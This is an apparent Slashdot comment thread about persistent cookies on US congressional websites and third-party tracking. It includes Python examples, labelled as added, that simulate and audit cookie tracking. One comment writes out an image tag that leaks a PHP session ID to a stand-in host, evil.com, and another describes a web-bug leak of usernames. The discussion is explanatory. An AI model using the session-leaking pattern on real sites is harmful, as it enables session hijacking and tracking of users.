More Cookie Investigations
FancyKetchup writes "This time, C|Net is caught up in cookie paranoia with their 'special investigation' into use of cookies on the Senate and House representative websites." From the article: "Sen. John McCain, R-Ariz., for instance, has been a longtime advocate of strict privacy laws to restrict commercial Web sites' data collection practices. In a statement posted on his own Web site, McCain assures visitors that 'I do not use 'cookies' or other means on my Web site to track your visit in any way.' But visiting mccain.senate.gov implants a cookie on the visitor's PC that will not expire until 2035. " Follow up to a story we reported on earlier.
It's less scary after factorization: The cookie will not expire until 5*11*37.
Can anyone direct me to an easy way to get a "wipe cookies" button in my Firefox toolbar? Perhaps something to make deleting all of my cookies as easy as hitting "refresh" while looking at a high school website?
Trying to use sarcasm in text-based forums does not work.
"Secondly, what's all the fuss about? Cookies are incredibly harmless compared to everything else floating around the internets. Right?"
wrong wrong wrong.
First, just because there are a lot of other things floating around doesn't mean things perceived as minor should be ignored.
Do you know what started the 'don't track cookies' effort within the government? The White House was tracking people who had cookies from a marijuana advocacy site.
The Kruger Dunning explains most post on
I cleared all cookies and went to mccain.senate.gov - checked the cookies and nothing. Anyone else?
My point was that you don't need cookies enabled to have your username and password filled in for you, that was it. What's the problem?
Guy asked me for a quarter for a cup of coffee. So I bit him.
some developers to avoid even session cookies by using URL strings instead
Yes, that is what I was thinking. We all love PHP right? And those long unique autogenerated PHPSESSIONIDs are perfect for cross site information transfer.
<img src="http://evil.com/foo.jpg?PHPSESSIONID=xyxxyxy">
These are done in spam mail all the time. I'm not sure if mail programs by default still show images, but it is common for them to have images that have appended your email address in some way to verify you got the message for more spam your way!
Now we can look at anybody's phone records, I'm not sure how much different this is. Actually, there is so much of everybody's personal information floating around for sale, I would bet that the supply outweighs the demand. I mean, besides the dumbass marketing folks that already fill up my mailbox with deceiving checks and other things that sometimes look important, who has the time or desire to spy on people that much?
Should I be more paranoid? I'm fairly paranoid already, but I can beef it up a bit if necessary.
Sorry, I don't have that directory entry, I do not install Flash and have no need for sites that insist on it as the only navigation option. With very few exceptions, a website should be inanimate. If there is a justifiable reason for a Flash content, there is not enough justification for using it on the front page, it should be buried deeper in the site with a reasonable HTTP alternative. I do not have a compelling need for dropdown menus and other useless eyecandy, a hyperlink works just fine for me. I find it annoying that they are trying to use MY computer to relieve THEIR server load, the same goes for Java. A site needs a double plus good reason for me to add them to my Java whitelist, even so I add a site with a great deal of distaste and distrust. After all, some marketing droid has probably stuck his fingers in the development and one must always suspect the motives of such.
There is no right to feel safe thru security vaudeville at the expense of everyone's freedom, privacy and tax money.
Hahahah, funny.... from the link: <html><title>Ook!</title><body>Sorry, links to Bugzilla from Slashdot are disabled.</body></html>
neat
well I was close. My memory is failing.
http://www.cnn.com/2005/TECH/internet/12/29/spy.agency.privacy.ap/index.html
relevant quote:
"The government first issued strict rules on cookies in 2000 after disclosures that the White House drug policy office had used the technology to track computer users viewing its online anti-drug advertising. Even a year later, a congressional study found 300 cookies still on the Web sites of 23 agencies."
however it still makes my point on one way a cookie can be used for malice.
http://www.wired.com/news/wireservice/0,69945-0.html?tw=rss.index
shows how cookies can be used to trace you through the web, as it were.
http://shns.scripps.com/shns/story.cfm?pk=COOKIES-06-20-00&cat=AN
"White House ads offering information on marijuana pop up when Internet users search for certain words connected to drugs on Internet search engines like AltaVista or Lycos. The banner ads steer users to the anti-drug site Freevibe.com, which is operated by the White House drug office. A tracking cookie is inserted in the user's personal computer as the site is activated.
Although Freevibe's privacy notice states that "no information, including your e-mail address, will be sold or distributed to any other organization," the site is connected Doubleclick.com. Officials of Doubleclick, a New York advertising firm that is one of the largest companies gathering data on Internet user use, told the Senate Commerce Committee last week it is developing new products that will profile more than 40 million Internet users."
here is an example where your information is tracked and sold.
I won't go into whether or not these particular cases were intended to abuse anyone, but it would be just as easy to use this data for profiling.
Would it be hard to imagine someone thinking "Well, if they are looking for ways to kick a drug habit, then they probably have drugs. Let's go arrest them!"?
oddly, I can't find the story that I heard about it originally.
The Kruger Dunning explains most post on
The trick is that the cookie can be linked to your personal information.
The classic "compromising cookie" scenario involves a cookie set by an embedded image from a different server.
Say that Evil, Inc runs a banner server banners.evil.com, which puts ads on kinky.xxx and on yourchurch.org (or maybe just an invisible "web bug" on either site). When you visit kinky.xxx, your browser requests the banner from banners.evil.com, which sets a cookie saying "I went to kinky.xxx and all I got was this lousy cookie". That cookie will be sent along with any request your browser makes to banners.evil.com.
Then you log in to yourchurch.org. Their home page has an image tag with a source like "http://banners.evil.com/spyonme.php?username=your name". Your browser makes this request to banners.evil.com, sending along the cookie that server set earlier. Your browser thus tells Evil, Inc your yourchurch.org username (in the image URL) and the fact that you visited kinky.xxx (in the cookie).
Evil, Inc phones up your pastor and lets him know so that he can shame you in front of the parish the next Sunday (turns out this is all part of your church's anti-porn crusade).
Tom Swiss | the infamous tms | my blog
You cannot wash away blood with blood
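The two page loads described in the comment above, modelled as a small simulation that also shows what blocking third-party cookies changes. This is an added example, not part of the original comment; the `banner.gif` path, the `yourname` value, the class names, and the simplification that the banner server records the embedding site from the Referer rather than writing it into the cookie are assumptions.

```python
from urllib.parse import urlsplit, parse_qs

class Browser:
    """Minimal model of a cookie jar keyed by the host that set the cookie."""
    def __init__(self, block_third_party=False):
        self.block_third_party = block_third_party
        self.jar = {}                      # host -> cookie value

    def fetch(self, page_host, resource_url, server):
        """Request resource_url as a sub-resource of a page served by page_host."""
        host = urlsplit(resource_url).hostname
        # Simplification: exact host comparison; browsers compare registrable domains.
        third_party = host != page_host
        allowed = not (third_party and self.block_third_party)
        sent = self.jar.get(host) if allowed else None
        set_cookie = server.handle(resource_url, referer_host=page_host, cookie=sent)
        if set_cookie and allowed:
            self.jar[host] = set_cookie

class BannerServer:
    """The third-party server: files everything a request reveals under its cookie id."""
    def __init__(self):
        self.profiles = {}                 # cookie id -> {"sites": set, "usernames": set}
        self.next_id = 1

    def handle(self, url, referer_host, cookie):
        new_cookie = None
        if cookie is None:                 # no cookie received: issue a fresh id
            cookie = new_cookie = f"uid{self.next_id}"
            self.next_id += 1
        prof = self.profiles.setdefault(cookie, {"sites": set(), "usernames": set()})
        prof["sites"].add(referer_host)
        prof["usernames"].update(parse_qs(urlsplit(url).query).get("username", []))
        return new_cookie

def run_scenario(block_third_party):
    browser, tracker = Browser(block_third_party), BannerServer()
    browser.fetch("kinky.xxx", "http://banners.evil.com/banner.gif", tracker)
    browser.fetch("yourchurch.org",
                  "http://banners.evil.com/spyonme.php?username=yourname", tracker)
    # A profile that joins a username with more than one site is the leak.
    return [p for p in tracker.profiles.values()
            if p["usernames"] and len(p["sites"]) > 1]
```

With third-party cookies blocked, the banner server still sees the username in the image URL, but it arrives under a fresh id each time and cannot be joined to the earlier visit.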
I suspect that I fall into the category dismissed as paranoid, but I think there are two things that really bother me about the use of cookies:
1) The fact that I can't understand the data contained in the cookie. Granted, I realize this is because in the early days of cookies, the info was saved as simple text and that was a huge security risk. I understand that personal data has to be encrypted for the sake of security, but other than personal data, I would like other data to not be gibberish. However, it appears all cookies are incomprehensible gibberish to me, and that makes me less trustful of them. I realize that this is not a consistent position. I can't read or understand the code that runs my computer, but I don't resent this the same way I do cookies. My distrust of cookies goes back to the early "abuses" of Doubleclick and their ilk, and this has left me less than receptive to cookies in general.
I always block cookies from every site I visit as a matter of habit because of the early cookie "abuses." If a site does not work properly because I have blocked its cookies, then I decide whether the content/service is valuable enough to me to allow the cookies--even then, I never allow persistent cookies. I simply don't understand why any site needs to set cookies that are valid until 2035. That strikes me as incredibly intrusive.
If all I want to do is browse content and the site does not function without cookies, then I leave the site, usually cursing under my breath or out loud if it was a particularly stupid cookie use.
2) What is even more heinous in my mind is the number of cookies thrown at you from domains outside of the one you are technically visiting. Granted, I always block third party cookies, but when I review (via adblock) the amount of crap being pumped into my browser that does not originate from the site I'm actually visiting (such as from google-analytics.com and a.as-us.falkag.net on the page where I'm typing this right now) and some of this content is delivered attached to a 1x1 invisible pixel, I can't help but wonder why sites are trying to hide from me what they are trying to do. And, of course, cookies are usually attached to these invisible intrusions.
Perhaps I would be less suspicious if I understood what was being accomplished, but the mere fact that it appears that these companies are trying to hide what they are doing makes me suspicious of their intent.
Does that qualify me for a tinfoil hat? Hmmm---perhaps I shouldn't ask that question here...
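The policy described in the comment above (refuse third-party cookies, never accept persistent ones) can be checked mechanically against the Set-Cookie headers a page load produces. This is an added example, not part of the original comment; the hosts, header values and audit date below are constructed, and `audit_set_cookie` and `audit_capture` are hypothetical names.

```python
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from http.cookies import SimpleCookie

def audit_set_cookie(page_host, response_host, header, now):
    """Classify every cookie in one Set-Cookie header seen while loading page_host."""
    jar = SimpleCookie()
    jar.load(header)
    findings = []
    for name, morsel in jar.items():
        days = None                                   # None = session cookie
        if morsel["max-age"]:                         # Max-Age takes precedence over Expires
            days = int(morsel["max-age"]) / 86400
        elif morsel["expires"]:
            expires = parsedate_to_datetime(morsel["expires"])
            days = (expires - now).total_seconds() / 86400
        # Simplification: exact host comparison; browsers compare registrable domains.
        third_party = response_host != page_host
        reasons = []
        if third_party:
            reasons.append("third-party")
        if days is not None and days > 0:             # an expiry in the past is a deletion
            reasons.append(f"persistent, {days / 365.25:.1f} years")
        findings.append({"name": name, "host": response_host, "lifetime_days": days,
                         "third_party": third_party, "reject": reasons})
    return findings

# Constructed capture: (page host, responding host, Set-Cookie header value).
NOW = datetime(2006, 1, 1, tzinfo=timezone.utc)       # assumed audit date
CAPTURE = [
    ("site.example", "site.example", "SESSION=c0ffee; Path=/"),
    ("site.example", "site.example",
     "visitor=42; Expires=Mon, 01 Jan 2035 00:00:00 GMT; Path=/"),
    ("site.example", "stats.example", "uid=7; Max-Age=63072000"),
]

def audit_capture(capture=CAPTURE, now=NOW):
    """Run the audit over every captured header and return one finding per cookie."""
    return [f for page, host, hdr in capture
            for f in audit_set_cookie(page, host, hdr, now)]

if __name__ == "__main__":
    for f in audit_capture():
        print(f["host"], f["name"], f["reject"] or "accept")
```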